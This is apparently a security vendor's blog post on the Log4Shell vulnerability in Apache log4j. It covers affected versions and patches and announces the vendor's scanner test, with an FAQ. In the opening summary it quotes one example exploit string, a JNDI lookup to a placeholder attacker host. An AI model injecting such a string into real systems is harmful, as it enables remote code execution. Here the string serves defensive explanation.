A lot has already been covered in the interwebs regarding CVE-2021-44228 and the newer CVE-2021–45046. In case you’re just arriving from the Maldives and just heard about the log4j RCE, here’s a quick summary:

• On Dec 9th, 2021, a critical vulnerability on Apache’s log4j package was disclosed and spread in the wild. Apache Log4j is a Java-based logging utility that is widely used in the Java world.
• The affected versions are from 2.0-beta-9 to 2.14.1. The vulnerability was patched in 2.15.0 (CVE-2021–44228). And then again patched on version 2.16.0 (CVE-2021–45046).
• This vulnerability can be easily exploited. All you need is to find a vulnerable version of log4j, an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string (e.g. ${jndi:ldap://attacker.com/a}), and a log statement that logs out the string from that request.

The following links are good information resources on how this vulnerability works and how it can be exploited:

• Inside the Log4j2 vulnerability (CVE-2021–44228)
• Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package
• Apache Log4j Security Vulnerabilities
• List of the affected software

When this vulnerability was released in the wild, our first priority at Probely was to make sure that we didn’t have any vulnerable version of log4j running. In parallel, we started working to add a test for this vulnerability on Probely.

Detecting log4j vulnerability with Probely

Probely now tests for vulnerable versions of log4j. It will send attack payloads in all relevant injection points, namely HTTP headers, GET parameters, and POST values. We use different attack payloads while testing, some of them to evade Web Application Firewalls (WAF).

The test for this vulnerability is included by default in all scanning profiles, except for lightning scans. In order to speed up testing on your side, we created a specific scanning profile ‘log4shell’ that will only test this vulnerability.

If you don’t have a Probely account yet, feel free to sign up and start a free 14-day trial. Happy Testing!

FAQ

Does Probely make me vulnerable to log4shell?

Probely is hosted in the cloud and is not running any vulnerable version of log4j.

The only component of Probely that can be hosted on your infrastructure is the farcaster agent, which allows you to scan internal targets. As you can see on our GitHub page, the agent is implemented in Go language and therefore does not use log4j.

Is Probely capable to detect log4shell vulnerability?

Yes, Probely tests for the log4j vulnerability in all scanning profiles other than the lightning profile. It also includes a specific scanning profile that only tests this vulnerability.

Is Probely capable to detect log4shell vulnerabilities on events that are not triggered during the scan time?

No, if the event that will trigger the vulnerability only occurs after the scan is finished, then Probely will not be able to detect the vulnerability. This could be the case, for instance, if you had a daily cron job that would process your access logs and use log4j.

In most cases, the vulnerability is triggered immediately and Probely is able to detect it. Imagine that your application uses log4j for the application logs, and logs an action that includes the username, name, or any other user input.